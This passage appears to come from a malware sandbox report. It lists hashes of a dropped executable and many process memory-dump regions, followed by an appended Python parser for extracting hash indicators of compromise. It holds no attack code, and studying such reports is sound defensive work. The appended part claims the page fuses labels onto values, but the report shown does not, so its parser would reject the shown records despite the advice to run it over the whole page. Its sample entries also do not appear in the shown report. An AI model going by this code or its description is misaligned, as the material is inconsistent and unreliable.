\Users\Admin\AppData\Local\Temp\nDRwKPXQhM.EXe
MD5
94a8db67ef7f01974e353cc670c7c012
SHA1
44723bc5ff2d38e98ca844b9a20cb88652321bd3
SHA256
ce55ef02983a3c2a33738a056e116869569d986ed1951fc16aab3b47d0610862
SHA512
d24532d057ae971a041623ab61c5776d006f3622102436aa604dc281ede5ae98d2eb69b29691678efc53f94bd2fd61af1c02530ad5c36d3a1995934c05369aa9
-
memory/276-729-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/276-230-0x0000000000000000-mapping.dmp
-
memory/324-260-0x0000000000810000-0x0000000000811000-memory.dmp
Filesize
4KB
-
memory/324-254-0x0000000000000000-mapping.dmp
-
memory/364-159-0x0000000000000000-mapping.dmp
-
memory/524-217-0x0000000000000000-mapping.dmp
-
memory/560-247-0x0000000002080000-0x0000000002CCA000-memory.dmp
Filesize
12.3MB
-
memory/560-246-0x0000000002080000-0x0000000002CCA000-memory.dmp
Filesize
12.3MB
-
memory/560-211-0x0000000000000000-mapping.dmp
-
memory/560-233-0x0000000000000000-mapping.dmp
-
memory/596-200-0x0000000000000000-mapping.dmp
-
memory/612-58-0x00000000001B0000-0x00000000001B9000-memory.dmp
Filesize
36KB
-
memory/612-54-0x000000000028D000-0x000000000029E000-memory.dmp
Filesize
68KB
-
memory/720-118-0x0000000004732000-0x0000000004733000-memory.dmp
Filesize
4KB
-
memory/720-109-0x0000000004731000-0x0000000004732000-memory.dmp
Filesize
4KB
-
memory/720-121-0x0000000004734000-0x0000000004736000-memory.dmp
Filesize
8KB
-
memory/720-106-0x0000000000800000-0x000000000081C000-memory.dmp
Filesize
112KB
-
memory/720-104-0x000000000040CD2F-mapping.dmp
-
memory/720-119-0x0000000004733000-0x0000000004734000-memory.dmp
Filesize
4KB
-
memory/720-108-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/720-103-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/720-114-0x0000000001ED0000-0x0000000001EEB000-memory.dmp
Filesize
108KB
-
memory/740-220-0x0000000000000000-mapping.dmp
-
memory/812-64-0x0000000000ADD000-0x0000000000AEE000-memory.dmp
Filesize
68KB
-
memory/812-60-0x0000000000000000-mapping.dmp
-
memory/824-76-0x0000000000000000-mapping.dmp
-
memory/856-161-0x0000000000000000-mapping.dmp
-
memory/856-328-0x0000000000000000-mapping.dmp
-
memory/932-169-0x0000000000000000-mapping.dmp
-
memory/952-184-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/952-180-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/952-179-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/952-181-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/952-182-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/952-183-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/952-173-0x0000000000000000-mapping.dmp
-
memory/960-280-0x0000000002080000-0x0000000002CCA000-memory.dmp
Filesize
12.3MB
-
memory/960-274-0x0000000000000000-mapping.dmp
-
memory/960-281-0x0000000002080000-0x0000000002CCA000-memory.dmp
Filesize
12.3MB
-
memory/988-261-0x0000000000000000-mapping.dmp
-
memory/988-206-0x0000000000000000-mapping.dmp
-
memory/1056-68-0x0000000000402DF8-mapping.dmp
-
memory/1064-575-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/1112-55-0x0000000000400000-0x0000000000409000-memory.dmp
Filesize
36KB
-
memory/1112-57-0x0000000075821000-0x0000000075823000-memory.dmp
Filesize
8KB
-
memory/1112-56-0x0000000000402DF8-mapping.dmp
-
memory/1128-491-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/1148-378-0x0000000000000000-mapping.dmp
-
memory/1164-80-0x0000000000400000-0x00000000008ED000-memory.dmp
Filesize
4.9MB
-
memory/1164-79-0x0000000000220000-0x0000000000233000-memory.dmp
Filesize
76KB
-
memory/1164-73-0x0000000000A3D000-0x0000000000A4E000-memory.dmp
Filesize
68KB
-
memory/1164-62-0x0000000000000000-mapping.dmp
-
memory/1180-148-0x0000000000400000-0x00000000008F0000-memory.dmp
Filesize
4.9MB
-
memory/1180-147-0x0000000000220000-0x0000000000241000-memory.dmp
Filesize
132KB
-
memory/1180-145-0x0000000000A9D000-0x0000000000AB1000-memory.dmp
Filesize
80KB
-
memory/1180-130-0x0000000000000000-mapping.dmp
-
memory/1192-192-0x0000000000000000-mapping.dmp
-
memory/1208-90-0x0000000000000000-mapping.dmp
-
memory/1212-134-0x0000000002550000-0x000000000258D000-memory.dmp
Filesize
244KB
-
memory/1212-140-0x0000000004C11000-0x0000000004C12000-memory.dmp
Filesize
4KB
-
memory/1212-138-0x0000000000220000-0x000000000026F000-memory.dmp
Filesize
316KB
-
memory/1212-137-0x0000000004C14000-0x0000000004C16000-memory.dmp
Filesize
8KB
-
memory/1212-132-0x0000000000A9D000-0x0000000000AD4000-memory.dmp
Filesize
220KB
-
memory/1212-141-0x0000000004C12000-0x0000000004C13000-memory.dmp
Filesize
4KB
-
memory/1212-133-0x00000000023B0000-0x00000000023EE000-memory.dmp
Filesize
248KB
-
memory/1212-116-0x0000000000000000-mapping.dmp
-
memory/1212-139-0x0000000000400000-0x0000000000913000-memory.dmp
Filesize
5.1MB
-
memory/1212-142-0x0000000004C13000-0x0000000004C14000-memory.dmp
Filesize
4KB
-
memory/1216-421-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/1232-136-0x000000001AA90000-0x000000001AA92000-memory.dmp
Filesize
8KB
-
memory/1232-143-0x0000000002120000-0x0000000002150000-memory.dmp
Filesize
192KB
-
memory/1232-129-0x0000000000820000-0x0000000000860000-memory.dmp
Filesize
256KB
-
memory/1232-126-0x000000013FB70000-0x000000013FB71000-memory.dmp
Filesize
4KB
-
memory/1232-144-0x00000000007F0000-0x000000000080B000-memory.dmp
Filesize
108KB
-
memory/1232-123-0x0000000000000000-mapping.dmp
-
memory/1256-187-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/1256-185-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/1256-188-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/1256-190-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/1256-189-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/1256-191-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/1256-174-0x0000000000000000-mapping.dmp
-
memory/1264-493-0x0000000004A60000-0x0000000004A76000-memory.dmp
Filesize
88KB
-
memory/1264-423-0x0000000004970000-0x0000000004986000-memory.dmp
Filesize
88KB
-
memory/1264-337-0x0000000004340000-0x0000000004356000-memory.dmp
Filesize
88KB
-
memory/1264-336-0x0000000004320000-0x0000000004336000-memory.dmp
Filesize
88KB
-
memory/1264-577-0x0000000005EB0000-0x0000000005EC6000-memory.dmp
Filesize
88KB
-
memory/1264-59-0x0000000002B20000-0x0000000002B36000-memory.dmp
Filesize
88KB
-
memory/1264-99-0x0000000003D70000-0x0000000003D86000-memory.dmp
Filesize
88KB
-
memory/1264-492-0x0000000004A20000-0x0000000004A36000-memory.dmp
Filesize
88KB
-
memory/1264-731-0x0000000006030000-0x0000000006046000-memory.dmp
Filesize
88KB
-
memory/1264-730-0x0000000005F90000-0x0000000005FA6000-memory.dmp
Filesize
88KB
-
memory/1264-654-0x0000000005EE0000-0x0000000005EF6000-memory.dmp
Filesize
88KB
-
memory/1264-653-0x00000000042F0000-0x0000000004306000-memory.dmp
Filesize
88KB
-
memory/1264-128-0x0000000004070000-0x0000000004086000-memory.dmp
Filesize
88KB
-
memory/1264-576-0x0000000005E80000-0x0000000005E96000-memory.dmp
Filesize
88KB
-
memory/1264-422-0x0000000004940000-0x0000000004956000-memory.dmp
Filesize
88KB
-
memory/1292-386-0x0000000000000000-mapping.dmp
-
memory/1308-241-0x0000000000000000-mapping.dmp
-
memory/1308-248-0x0000000000ADD000-0x0000000000B5A000-memory.dmp
Filesize
500KB
-
memory/1308-250-0x0000000000960000-0x0000000000A36000-memory.dmp
Filesize
856KB
-
memory/1308-251-0x0000000000400000-0x0000000000959000-memory.dmp
Filesize
5.3MB
-
memory/1344-97-0x0000000000030000-0x0000000000039000-memory.dmp
Filesize
36KB
-
memory/1344-71-0x0000000000000000-mapping.dmp
-
memory/1344-98-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/1344-96-0x0000000000020000-0x0000000000028000-memory.dmp
Filesize
32KB
-
memory/1444-394-0x0000000000000000-mapping.dmp
-
memory/1468-170-0x0000000000000000-mapping.dmp
-
memory/1472-285-0x0000000000000000-mapping.dmp
-
memory/1488-549-0x00000000024F0000-0x000000000313A000-memory.dmp
Filesize
12.3MB
-
memory/1488-548-0x00000000024F0000-0x000000000313A000-memory.dmp
Filesize
12.3MB
-
memory/1488-547-0x00000000024F0000-0x000000000313A000-memory.dmp
Filesize
12.3MB
-
memory/1536-91-0x0000000000000000-mapping.dmp
-
memory/1556-303-0x0000000000000000-mapping.dmp
-
memory/1560-312-0x0000000000000000-mapping.dmp
-
memory/1588-338-0x0000000000000000-mapping.dmp
-
memory/1608-320-0x0000000000000000-mapping.dmp
-
memory/1616-209-0x0000000000000000-mapping.dmp
-
memory/1624-194-0x0000000000000000-mapping.dmp
-
memory/1628-87-0x0000000000400000-0x000000000042F000-memory.dmp
Filesize
188KB
-
memory/1628-77-0x0000000000000000-mapping.dmp
-
memory/1628-85-0x0000000000220000-0x0000000000228000-memory.dmp
Filesize
32KB
-
memory/1628-86-0x0000000000230000-0x0000000000239000-memory.dmp
Filesize
36KB
-
memory/1640-172-0x0000000000000000-mapping.dmp
-
memory/1672-163-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/1672-166-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/1672-165-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/1672-164-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/1672-219-0x0000000000000000-mapping.dmp
-
memory/1672-168-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/1672-167-0x0000000001040000-0x0000000001656000-memory.dmp
Filesize
6.1MB
-
memory/1672-157-0x0000000000000000-mapping.dmp
-
memory/1676-215-0x0000000000000000-mapping.dmp
-
memory/1684-111-0x0000000000000000-mapping.dmp
-
memory/1684-112-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmp
Filesize
8KB
-
memory/1684-198-0x0000000000000000-mapping.dmp
-
memory/1684-120-0x0000000001D80000-0x0000000001DE3000-memory.dmp
Filesize
396KB
-
memory/1696-273-0x0000000000000000-mapping.dmp
-
memory/1696-362-0x0000000000000000-mapping.dmp
-
memory/1708-240-0x0000000004931000-0x0000000004932000-memory.dmp
Filesize
4KB
-
memory/1708-242-0x0000000004932000-0x0000000004933000-memory.dmp
Filesize
4KB
-
memory/1708-245-0x0000000004934000-0x0000000004936000-memory.dmp
Filesize
8KB
-
memory/1708-225-0x0000000000400000-0x0000000000452000-memory.dmp
Filesize
328KB
-
memory/1708-244-0x0000000004933000-0x0000000004934000-memory.dmp
Filesize
4KB
-
memory/1708-224-0x0000000000250000-0x0000000000289000-memory.dmp
Filesize
228KB
-
memory/1708-223-0x0000000000220000-0x000000000024B000-memory.dmp
Filesize
172KB
-
memory/1708-229-0x0000000001DE0000-0x0000000001E0E000-memory.dmp
Filesize
184KB
-
memory/1708-294-0x0000000000000000-mapping.dmp
-
memory/1708-212-0x0000000000000000-mapping.dmp
-
memory/1708-231-0x0000000001E10000-0x0000000001E3C000-memory.dmp
Filesize
176KB
-
memory/1732-346-0x0000000000000000-mapping.dmp
-
memory/1740-171-0x0000000000000000-mapping.dmp
-
memory/1740-354-0x0000000000000000-mapping.dmp
-
memory/1744-84-0x0000000000000000-mapping.dmp
-
memory/1768-546-0x0000000000400000-0x000000000040F000-memory.dmp
Filesize
60KB
-
memory/1792-402-0x0000000000000000-mapping.dmp
-
memory/1824-81-0x0000000000000000-mapping.dmp
-
memory/1936-335-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/1936-329-0x0000000000000000-mapping.dmp
-
memory/1944-332-0x0000000000402DF8-mapping.dmp
-
memory/1968-100-0x0000000000A1D000-0x0000000000A40000-memory.dmp
Filesize
140KB
-
memory/1968-107-0x0000000000220000-0x0000000000250000-memory.dmp
Filesize
192KB
-
memory/1968-88-0x0000000000000000-mapping.dmp
-
memory/1976-203-0x0000000000000000-mapping.dmp
-
memory/1988-652-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/1992-370-0x0000000000000000-mapping.dmp
-
memory/2036-94-0x0000000000000000-mapping.dmp
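The dropped-files and memory-dump tables above reach most analysts as flattened text like this: each label (MD5, SHA1, SHA256, SHA512, Filesize) fused onto the value next to it, the same file repeated once per drop event, and region dumps with a rounded size beside their address range. The parser below is an added example, not part of the sandbox report or any vendor tooling, showing how to turn that text into checked IoCs: it splits the fused labels, rejects digests of the wrong length, collapses repeated drops into one entry with a count, and cross-checks each region's reported Filesize against the size implied by its address range (the range is the ground truth; the Filesize is a rounded display value). SAMPLE_REPORT is constructed from a handful of the entries above (one file deliberately listed twice); every function and constant name is this example's own.

```python
"""Parse a flattened Triage-style dropped-file / memory-dump listing into checked IoCs."""
import re
from collections import OrderedDict

HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}  # hex digits per digest
# Longest label first so "SHA512..." is never read as "SHA1" followed by "2...".
FUSED_HASH = re.compile(r"^(SHA512|SHA256|SHA1)([0-9a-fA-F]+)$")
MEM_REGION = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmpFilesize$")
MEM_MAPPING = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-mapping\.dmp$")
SIZE_UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2}

# Constructed sample input: entries copied from the report in the fused label/value
# form the flattened page uses (366.exe is listed twice on purpose, as the report does).
SAMPLE_REPORT = r"""
\Users\Admin\AppData\Local\Temp\101.exeMD5
1bef6a1a0d0cdcb868aaa9fffd513f25
SHA1769fce57adacbfca686118f9a45fce099abf2a20
SHA256a36434a7f29255e4053d5593765e3eb27a4f257581f0a10f76ea8bec24850ab4
SHA5129cc963e386a8f7c2dcf0369987ebd60b7f45a9cd51d085505edc98aebc1d3e3a0591c32c5d193e9f9d1345780fb79cafbb21e1988a96d9b6fa4fef9cdbe1521a
-
\Users\Admin\AppData\Local\Temp\366.exeMD5
415ca937476dbf832d67387cc3617b37
SHA18e0c58720101aaa9caf08218d40a1b0639801e04
SHA2566a099291e21f6e5bb49ace86a55bee087b9811e178693d0207dc9152beb39b76
SHA5125d649864508445aed5e1a1a70042d1ed32f5dd15d12e9466d82a72861d86f87f4c225931eb06fd5605292db431824b0450acd14cf408ea70c08b686e137c6c63
-
\Users\Admin\AppData\Local\Temp\366.exeMD5
415ca937476dbf832d67387cc3617b37
SHA18e0c58720101aaa9caf08218d40a1b0639801e04
SHA2566a099291e21f6e5bb49ace86a55bee087b9811e178693d0207dc9152beb39b76
SHA5125d649864508445aed5e1a1a70042d1ed32f5dd15d12e9466d82a72861d86f87f4c225931eb06fd5605292db431824b0450acd14cf408ea70c08b686e137c6c63
-
memory/720-106-0x0000000000800000-0x000000000081C000-memory.dmpFilesize
112KB
-
memory/720-104-0x000000000040CD2F-mapping.dmp
-
"""


def split_records(text):
    """Records are separated by a bare '-' line; blank lines are dropped."""
    chunks = re.split(r"(?m)^-$\n?", text)
    return [[l.strip() for l in c.splitlines() if l.strip()] for c in chunks if c.strip()]


def parse_size(text):
    """'204KB' -> (208896.0, 512.0): bytes plus half the displayed resolution (rounding slack)."""
    m = re.fullmatch(r"(\d+(?:\.(\d+))?)(B|KB|MB)", text)
    if not m:
        raise ValueError(f"bad size: {text!r}")
    unit = SIZE_UNITS[m.group(3)]
    return float(m.group(1)) * unit, unit / 10 ** len(m.group(2) or "") / 2


def parse_dropped_file(lines):
    """'<path>MD5', the MD5 on the next line, then fused 'SHA1<hex>', 'SHA256<hex>', 'SHA512<hex>' lines."""
    if len(lines) < 2 or not lines[0].endswith("MD5"):
        raise ValueError(f"unexpected dropped-file record: {lines[0]!r}")
    entry = {"path": lines[0][:-3], "MD5": lines[1].lower()}
    for line in lines[2:]:
        m = FUSED_HASH.match(line)
        if not m:
            raise ValueError(f"unrecognised hash line: {line!r}")
        entry[m.group(1)] = m.group(2).lower()
    for algo, length in HASH_LENGTHS.items():  # reject truncated, garbled or missing digests
        if not re.fullmatch(r"[0-9a-f]{%d}" % length, entry.get(algo, "")):
            raise ValueError(f"{entry['path']}: bad or missing {algo}")
    return entry


def parse_memory(lines):
    """A region dump ('...-memory.dmpFilesize' plus a rounded size) or a bare mapping dump."""
    m = MEM_REGION.match(lines[0])
    if m and len(lines) == 2:
        start, end = int(m.group(3), 16), int(m.group(4), 16)
        reported, slack = parse_size(lines[1])
        # The address range is ground truth; the Filesize is a rounded display value.
        return {"kind": "region", "pid": int(m.group(1)), "start": start, "end": end,
                "size": end - start, "size_consistent": abs(end - start - reported) <= slack}
    m = MEM_MAPPING.match(lines[0])
    if m and len(lines) == 1:
        return {"kind": "mapping", "pid": int(m.group(1)), "addr": int(m.group(3), 16)}
    raise ValueError(f"unrecognised memory entry: {lines!r}")


def parse_report(text):
    """Return unique dropped files (with drop counts), region dumps and mapping dumps."""
    files, regions, mappings = OrderedDict(), [], []
    for rec in split_records(text):
        if rec[0].startswith("memory/"):
            item = parse_memory(rec)
            (regions if item["kind"] == "region" else mappings).append(item)
            continue
        entry = parse_dropped_file(rec)
        key = (entry["path"], entry["SHA256"])  # the report repeats a file once per drop event
        if key in files:
            files[key]["occurrences"] += 1
        else:
            files[key] = dict(entry, occurrences=1)
    return {"files": list(files.values()), "regions": regions, "mappings": mappings}


def ioc_lines(report):
    """One 'sha256  path' line per unique dropped file, ready for a blocklist or hunt query."""
    return [f"{f['SHA256']}  {f['path']}" for f in report["files"]]
```

Run `parse_report` over the whole flattened page rather than the sample to get the full IoC set; the size check is what catches a truncated or mis-copied address range before the dump is carved from disk, and the occurrence count preserves the fact that a file was dropped several times without flooding the blocklist with duplicates.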